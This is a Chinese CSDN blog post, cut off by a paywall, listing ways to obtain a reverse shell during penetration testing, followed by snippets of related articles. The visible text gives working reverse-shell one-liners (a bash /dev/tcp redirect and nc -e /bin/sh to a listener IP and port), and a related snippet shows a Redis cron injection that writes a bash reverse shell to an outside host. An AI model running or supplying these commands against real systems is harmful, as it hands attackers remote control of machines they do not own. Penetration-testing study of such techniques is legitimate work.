反弹 shell 的 N 种方式

最新推荐文章于 2024-06-01 11:15:00 发布
最新推荐文章于 2024-06-01 11:15:00 发布
阅读量241 收藏
点赞数
分类专栏: web安全攻防详解
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34236803/article/details/110580750
版权

反弹 shell N 种方式

在实际的渗透测试过程中,一旦拿到高权限 shell,马上就会准备做流量代

理,尝试各种反向代理和正向代理,然后选择流量通透性较好的机器就要准备

内网渗透了,关于反向代理和正向代理,有时间我在写,比较杂,而且为了保

证各位的最佳阅读体验,所有的工具和方式我都要实测之后再整理发布相关知

识文章,这一次我来讲一下关于反弹 shell 的知识,这部分知识可能说起来一句

话也行:

bash -i >& /dev/tcp/10.22.225.77/777 0>&1

其中 10.22.225.77 为接受反弹 shell 的机器,777 为反弹 shell 的机器开放的

端口。

上述 bash 反弹 shell 语言想必日常渗透的都知道的,这也是用的最多的一

种方式,不过有时候 bash 无法反弹的时候,就可以试试其他的方法了,这也是

我在项目中遇到过的问题。

以下的所有反弹中,10.22.225.77 为接受反弹 shell 的机器,777 为反弹 sh

ell 的机器开放的端口。

**一、nc **反弹

如果有**-e** 参数:

nc -e /bin/sh 10.22.225.77 777

如果没有**-e** 参数:<

了解本专栏 订阅专栏 解锁全文 超级会员免费看
吾爱测试
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
订阅专栏
反弹Shell,看这一篇就够了
Appleteachers的博客
04-24 1155
前言 在渗透测试实战中,我们经常会遇到Linux系统环境,而让Linux主机反弹shell是再常见不过的事情了。 反弹shell,就是攻击机监听在某个TCP/UDP端口为服务端,目标机主动发起请求到攻击机监听的端口,并将其命令行的输入输出转到攻击机。 正向连接 假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、web服务、ssh、telnet等等都是正向连接。 反向连接 那么为什么要用反弹shell
常见工具 nc Wireshark反弹shell
代码审计
04-20 1149
常⽤⼯具 • 经常使⽤且功能强⼤ • 安全从业者必不可少的帮⼿ • Nc / ncat • Wireshark • Tcpdump nc -lvp 使用nc 监听特定的端口 nc -nv ip port 连接特定ip下的指定端口 NETCAT ——NC • ⺴络⼯具中的瑞⼠军⼑——⼩⾝材、⼤智慧 • 侦听模式 / 传输模式 • telnet / 获取banner信息 • 传输⽂本信息 • 传输⽂件/⺫录 • 加密传输⽂件 • 远程控制/⽊⻢ • 加密所有流量 • 流媒体服务器 • 远程克隆硬盘 root@
端口代理反弹shell原理应用
qq_39641273的博客
06-14 385
我们发现在实际的攻击过程中,使用常规反弹shell攻击者的计算机IP地址将被暴露给受害者计算机,因为攻击者需要将自己的计算机IP地址提供给受害者计算机以建立连接。当对方具备一定的抓包和溯源能力就能借此溯源到攻击者。因此,对方反弹shell攻击可能会危及攻击者的匿名性和安全。这些技术可以用来隐藏攻击者的真实IP地址,从而增强攻击的匿名性和安全性。下面是一些常用的增强反弹shell匿名性的技术:端口转发:攻击者可以使用端口转发技术将流量从受害者计算机转发到攻击者的计算机上,从而隐藏自己的真实IP地址。
【安全知识】——LInux的shell反弹姿势合集(更新中)
最新发布
A_991128a的博客
06-01 728
*作者名:白昼安全主页面链接:座右铭: 不要让时代的悲哀成为你的悲哀专研方向: web安全,后渗透技术每日鸡汤: **当我们拿到一台LINUX主机的权限时,往往都需要反弹到公网的服务器上,一般我们使用bash来反弹的情况居多,但是bash也有失灵的时候。在这情况下,我们可以尝试使用其他的反弹语句来达到我们的目的。下面给大家列举一些平时用的比较多的这里的演示环境为。
linux类反弹shell特征提取
SHELLCODE_8BIT的博客
04-09 1981
1.标准输入0的pipe被转到其他进程,也就是只需要匹配bash的0既然,不需要12也匹配,这样减少性能消耗。这没有回显,但是可以执行命令。pipe和爷进程交互。
TCP劫持及反弹shell攻击
247533的博客
11-23 939
TCP劫持及反弹shell攻击
Linux下NC反弹shell命令(推荐)
09-15
在网络安全和渗透测试中,反弹Shell是一常见的技术,它允许攻击者远程控制受感染的系统。在Linux环境中,网络工具`nc`(Netcat)常被用来创建这连接。本篇文章将详细介绍如何在Linux下使用`nc`进行反弹Shell操作...
solairs shell cmd
04-03
n`或`!command`执行历史中的命令。 了解并熟练掌握这些Solairs Shell Cmd的基本操作和高级特性,能极大地提升你在Solairs系统上的工作效率和问题解决能力。不过,由于具体的Solairs Shell Cmd特性和命令并未详细给...
NcPutter:与Nc.exe一起发送文件
04-29
NCPutter.exe,用来再只有bash反弹shell的w情况下上传文件至目标主机,需要与nc.exe配合使用. 用法: 1)首先将待发送的文件base64编码,推荐使用windows下自带的certutil.exe工具,例如我要上传至目标linux的文件为...
redis权限webshell1
08-08
接下来,攻击者设置 key(0) 为 bash 反弹 shell 的脚本,每分钟执行一次,在自己服务器上监听 7890 端口: `set 0 "\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/103.21.140.84/7890 0>&1\n\n"` 攻击者还需要设置...
Linux内网渗透.doc
07-08
* 反弹 shell 提权 提权辅助工具: * GTFOBins:https://gtfobins..io/ GTFOBins 是一个精心策划的 Unix 二进制文件列表,可以用来绕过错误配置系统中的本地安全限制。 * BeRoot:...
端口复用/重用反弹shell
04-14
端口复用/重用反弹shell 可以利用系统已经开启的端口,如:139,445,1025等。
反弹shell汇总(超详细)
qq_52173020的博客
05-27 7136
反弹shell姿势大全
利用OpenSSL加密反弹shell流量
The current road is different, love needs to distinguish between right and wrong
02-15 3220
简介 在进行后渗透阶段的时候通常为了进一步横向操作往往需要反弹 shell,但是反弹 shell 方式都有一个缺点,流量是以明文方式进行传输的。进行流量分析的话就会很快被发现,如果对攻击流量进行溯源分析,检测带有攻击的特征,就可以复现攻击过程。 实验环境 kali:192.168.95.128 centos:192.168.95.147 Wireshark抓包 在kali上使用nc监听一个端口 nc -lvvp 4444 将centos的shell反弹过去 bash -i
【转】反弹Shell,看这一篇就够了
热门推荐
mastergu2的博客
10-26 2万+
前言 在渗透测试实战中,我们经常会遇到Linux系统环境,而让Linux主机反弹shell是再常见不过的事情了。 反弹shell,就是攻击机监听在某个TCP/UDP端口为服务端,目标机主动发起请求到攻击机监听的端口,并将其命令行的输入输出转到攻击机。 正向连接 假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、web服务、ssh、telnet等等都是正向连接。 反向连接 那么为什么要用反弹shell
别再头疼反弹Shell失败了,这篇文章带你找到问题根源
vivlol918的博客
09-01 1331
例如,如果目标系统的防火墙只允许80端口(HTTP)和443端口(HTTPS)的流量通过,而你尝试使用其他端口进行反弹shell,那么连接将被阻止,导致失败。
渗透学习-靶场篇-XSS之订单与shell箱子反杀
qq_43696276的博客
09-19 2453
这里,我们将综合的利用一下xss平台去进行对之前的某些站点进行攻击。本次将主要利用的是军锋真人cs野战的订单平台进行实验。除此之外,我们还将进行shell箱子的反杀过程!!
Shell】重定向以及基础的bash反弹shell的学习
BrosyveryOK的博客
09-14 1669
最近学了下shell脚本的编写,看见重定向想起前几天反弹shell的一道题,当时还看不太懂,学完重定向之后就有点能看懂了,写篇文章记录一下。
反弹shell方式
08-11
在Linux系统下,一常见的反弹shell方式是通过Bash反弹。这方式可以使用一些命令行工具(如nc或socat)来建立与攻击者之间的连接。另外,Cobalt Strike工具的Scripted Web Delivery模块也可以通过bitsadmin、...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值